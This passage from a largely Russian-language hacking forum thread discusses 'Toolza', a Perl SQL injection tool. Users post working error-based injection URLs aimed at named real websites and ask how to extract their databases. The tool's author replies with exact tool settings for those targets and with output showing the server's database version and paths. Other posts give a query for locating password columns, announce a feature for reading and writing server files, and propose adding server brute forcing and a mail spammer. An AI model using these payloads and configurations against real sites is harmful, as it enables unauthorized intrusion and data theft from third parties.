Toolza 1.0

Discussion in 'PHP' started by Pashkela, 17 Oct 2009.

  1. roxblnfk

    roxblnfk Elder - Старейшина

    Joined:
    6 Feb 2010
    Messages:
    189
    Likes Received:
    42
    Reputations:
    19
    ты про консоль? тогда в помощь:
    ctrl+s = остановить/продолжить выполнение
    ctrl+c = прекратить выполнение
     
  2. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    А можно как-то с помощью toolsы вылавливать ответ с хидера? так как бывают ситуации, что результат возвращается не в теле страницы а в параметре хидера
     
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    пока нет, но наверное сделаю, попозже
     
  4. Getty

    Getty Banned

    Joined:
    17 Jun 2010
    Messages:
    104
    Likes Received:
    1
    Reputations:
    0
    Хорошая вещь. Респект автору!
     
  5. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    да, а еще есть [pause/break] и ctrl-[pause/break] :)
    т.е. за информацию спасибо, но она никакого, по крайней мере прямого, отношения к этому:
    не имеет. или ты думал что у меня лог не сохраняет по причине того, что я окно крестиком закрываю ? то не, я не такой, у меня и справка есть :) [c] князь мышкинъ, программист по образованию :)


    ок. ну все, терь уважаю тя и как чела, и как программера, и как чела, шарящего в уязвимостях ;) [прямо полный набор получился :) респект Тебе, Человечище ;) ]
     
  6. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    Hi


    How can i get its Database and Tables and Columns and its Data through Toolza

    vulnerable url

    http://www.downloadhq.org/search.php?q=Fantasy',(select%20count(*)%20from%20 (select%201%20union%20select%202%20union%20select% 203)x%20group%20by%20concat(version(),floor(rand(0 )*2))))%23

    Thank you
     
  7. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    Pashkela

    чтоб опять не возникло моя твоя не понимай, решил уточнить то, что я имел в виду по поводу использования like при блинд:

    вводим условие имя на колонки, например pass [%pass%=0x257061737325] и при выборке/подборке колонок и таблиц используем следующее условие:

    select table_name, column_name from information_schema.columns where column_name like 0x257061737325 and TABLE_SCHEMA=database();

    => таким образом количество запросов при поиске нужных данных можно уменьшить в 10-ки или даже 100-ни раз. на выходе должны получить примерно следующее:
    table1.column11
    table1.column12
    table2.column21
    ...
    tableN.columnN1
     
    #267 DrakonHaSh, 19 Jun 2010
    Last edited: 19 Jun 2010
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    1.Right SQl injection url (for Toolza):
    Code:
    http://www.downloadhq.org/search.php?q=Fantasy',(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+search+group+by+2+limit+1)a),'
    
    2. Settings in toolza.pl:
    Code:
    $method = 1;
    $f_table = "search";
    $f_url = "http://www.downloadhq.org/search.php?q=Fantasy',(select+1+from+";
    $f_plus = "+";
    $f_filtr = "a),'";
    
    results:
    Code:
    12
    Your choice: 12
    -------------------------------------------------------------------
                   Choose mode:
    -------------------------------------------------------------------
        [1] floor(rand()) - system information
        [2] floor(rand()) - get DB-names from information_schema.schemata
        [3] floor(rand()) - get tables from DB-name
        [4] floor(rand()) - get column_name from tables from DB-name
        [5] floor(rand()) - get tables from information_schema (current DB)
        [6] floor(rand()) - get column_name from table (current DB)
        [7] floor(rand()) - get data from columns
        [8] floor(rand()) - Mysql4 inj brute tables and columns
    -------------------------------------------------------------------
        [9] Main menu
    -------------------------------------------------------------------
    1
    Your choice: 1
    -----------------------------------------
    System information:
    -----------------------------------------
    Request method - POST
    ----------------------
    ver:5.0.77
    base:DHQ
    basedir:/usr/
    datadir:/mnt/sdb/mysql/
    tmpdir:/tmp/
    os:redhat-linux-gnu
    
    2 DrakonHaSh: ok-ok
     
    #268 Pashkela, 19 Jun 2010
    Last edited: 19 Jun 2010
  9. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    Problem solved

    Thank you very much
     
  10. _iks_

    _iks_ Member

    Joined:
    21 Feb 2009
    Messages:
    60
    Likes Received:
    59
    Reputations:
    61
    Как работать постом? Например, есть в форме одно поле - id.
    Code:
    $method = 1; # 1- Post; 0 - GET метод запросов | Post or Get method, 1-POST; 0-GET
    ...
    http://host/form.php?id=1+union+select+^
    Так не выходит

    И еще: скрипт посылает заголовок Referer как Http-Referer, это впрочем легко изменить в исходниках.
     
    #270 _iks_, 25 Jun 2010
    Last edited: 25 Jun 2010
  11. _iks_

    _iks_ Member

    Joined:
    21 Feb 2009
    Messages:
    60
    Likes Received:
    59
    Reputations:
    61
    Up.

    Или POST вообще не поддерживается?
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    update:======>download

    Mysql inj LOAD_FILE (file_priv = Y) - читаем файлики, когда есть возможность - содержимое директорий. Автохекс. Запись в файл. Показывается только нужное содержимое.
     
  13. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    how can i use this link in toolza ?

    http://www.team-dignitas.org/index.php?id=10104%27+and+%28select+1+from+%28select+count%280%29,concat%28%28select+version%28%29%29,floor%28rand%280%29*2%29%29+from+news+group+by+2+limit+1%29a%29--+
     
  14. Getty

    Getty Banned

    Joined:
    17 Jun 2010
    Messages:
    104
    Likes Received:
    1
    Reputations:
    0
    Как сканировать определенный сайт?
     
  15. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    Как я могу использовать эту ссылку в toolza для получения данных и таблиц и столбцов?


    http://www.team-dignitas.org/index.php?id=10104%27+and+%28select+1+from+%28sele ct+count%280%29,concat%28%28select+version%28%29%2 9,floor%28rand%280%29*2%29%29+from+news+group+by+2 +limit+1%29a%29--+
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    $method = 1; #Post or Get method, 1-POST; 0-GET
    $f_table = "news";
    $f_url = "http://www.team-dignitas.org/index.php?id=10104'+and+(select+1+from+"; # url
    $f_plus = "+";
    $f_filtr = "a)--+"; # close SQL


    last time here, after - https://rdot.org/forum
     
  17. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    Thank you very much
     
  18. ZAV

    ZAV New Member

    Joined:
    6 May 2010
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    мое предложение добавить:
    1. брут дедиков
    2. спамер почты
     
  19. Getty

    Getty Banned

    Joined:
    17 Jun 2010
    Messages:
    104
    Likes Received:
    1
    Reputations:
    0
    Столкнулся вепрвые с name_const
    навели меня на эту утилитку + заодно увидел и другую утилиту sql... как-то там

    По мне лично,как новичку, удобнее пользоваться Toolza как говориться есть какой никакой интерактив, т.е. выбрал,выбрал...и пошел...

    Скорость....что касается скорости я особо не запариваюсь, для меня важен результат, результат был получен, спасибо Pashkela.

    ИМХО утилита - проста, разнообразна по функционалу, удобна "как для новичка".
    Спорить об алгоритмах, быстродействиях не могу ввиду своих малых познаниях в SQL
     
  20. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Бред, такая функциональность в тулзе ни к селу ни к городу